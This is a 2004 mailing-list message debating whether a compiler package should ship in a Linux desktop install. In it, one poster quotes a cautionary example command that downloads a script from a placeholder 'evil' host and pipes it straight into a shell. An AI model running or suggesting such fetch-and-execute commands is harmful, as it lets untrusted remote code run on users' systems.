build-essential
John
dingo at coco2.arach.net.au
Mon Sep 6 02:14:04 CDT 2004
Matt Zimmerman wrote:
>On Sat, Sep 04, 2004 at 10:08:20AM +1000, Jeff Waugh wrote:
>
>
>
>><quote who="Matt Zimmerman">
>>
>>
>>
>>>Removing the compiler only creates a marginal amount of extra work for an
>>>attacker who will just upload or download their own binaries or find
>>>another way around it, while the other 99.9% of people using the system
>>>are needlessly inconvenienced.
>>>
>>>
>>The other 99.9% of people using the system... Are they all going to use GCC?
>>
>>
>
>A lot of Linux users are accustomed to using gcc. Not only developers;
>novices are taught that this is the way to get things done. They compile
>the kernel. They compile device drivers. They compile random things they
>download from the Internet.
>
>
>
>>Our desktop seed is meant to provide the greatest common factor of packages
>>that will be used on a desktop machine. It's *not* meant to be a superdooper
>>hacker workstation.
>>
>>
>
>Reaching out to non-technical users is great, but it doesn't require that we
>abandon traditional Linux users and their expectations.
>
>
I wouldn't want my secretarial or finance or other office staff building
software or installing software or configuring the system.
I'd also like to limit the damage following instructions like this might do:
lynx -dump http://evil.canonical.com/runme | bash >/dev/null 2>&1
might do.
As I recall, the instructions for installing Red Carpet are/were
somewhat like this.
If that doesn't give you nightmares, you don't have much imagination:-)
More information about the sounder
mailing list